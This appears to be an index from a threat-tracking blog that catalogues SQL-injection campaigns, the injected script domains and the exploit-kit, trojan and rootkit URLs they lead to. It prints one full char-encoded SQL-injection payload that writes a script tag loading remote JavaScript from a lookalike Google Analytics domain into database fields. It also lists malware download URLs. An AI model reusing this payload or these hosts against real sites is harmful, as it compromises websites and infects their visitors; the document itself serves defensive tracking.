nutcountry.ru

sql-injection of iframe links – http://nutcountry.ru:8080/index.php?pid=13

the domain is currently not resolvable.

google-analytiics.com

Notice the 2 ‘i’ in the domain?

The sql-injection attack comes in the form


set+variable=cast(variable+as+varchar(8000))%2Bcast(
char(060)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(116)%2Bchar(121)%2Bchar(112)%2Bchar(101)%2Bchar(61)%2Bchar(34)%2Bchar(116)%2Bchar(101)%2Bchar(120)%2Bchar(116)%2Bchar(47)%2Bchar(106)%2Bchar(97)%2Bchar(118)%2Bchar(97)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(34)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(34)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(97)%2Bchar(110)%2Bchar(97)%2Bchar(108)%2Bchar(121)%2Bchar(116)%2Bchar(105)%2Bchar(105)%2Bchar(99)%2Bchar(115)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(99)%2Bchar(104)%2Bchar(105)%2Bchar(110)%2Bchar(46)%2Bchar(106)%2Bchar(115)%2Bchar(34)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)+as+varchar(8000))
Continue reading →

z360.net/a.js

this injected script also has several associated domains

• dd45h.8866.org/fkzd/16.htm
• wm.1kfie.cn/x150/xx.html

One of the exploit downloads a rootkit from d.cdwsx.com/xx/x150.css [VT Analysis]

k.18xn.com/x.js

active sql-injection attack.

Injected scripts and exploits iframe to several urls such as:

• http://www.gehae.info/fox/index.html
• http://www.haerh.info/mam.exe

the scripts generate some form of ‘time-based’ parameters that probably is only available for a brief period.

The trojan downloader from http://www.haerh.info get a list of evil programs from http://www.gehae.info/2.txt

a0v.org/x.js

another round of sql-injection attacks.

x.js calls iframe src http://www.jejsaj.com/ya/index.html

jejsaj contains various exploits targeting among others

• owc 0-day
• realplayer
• msvidctl.dll

the exploits download trojans from http://www.wowand.com

f1y.in/j.js

another round of sql-injection attempt

Update: beware of this malicious script as it is making use of OWC 0-day.
Ref – http://isc.sans.org/diary.html?storyid=6811

218.213.77.96/a.js

a recent round of sql-injected link.
Continue reading →

3b3.org/c.js

This sql-injected script src has been around for some time.

The interesting point of this script is that it behaves differently if the injected site is from “.gov.cn” or “.edu.cn”. Code as shown below: Continue reading →

cn0093.cn/v.js

following previous post, a new injected script has emerged that resolves to same IP.

v.js retrieves another iframe src http://www.vieio.cn/i.htm.

This exploitation kit tries to avoid detection by splitting each respective exploit into 2 files. One .htm and .js

tsnse.cn/i.js

This sql-injected script calls iframe http://www.gomne.cn/yh.htm

Continue reading →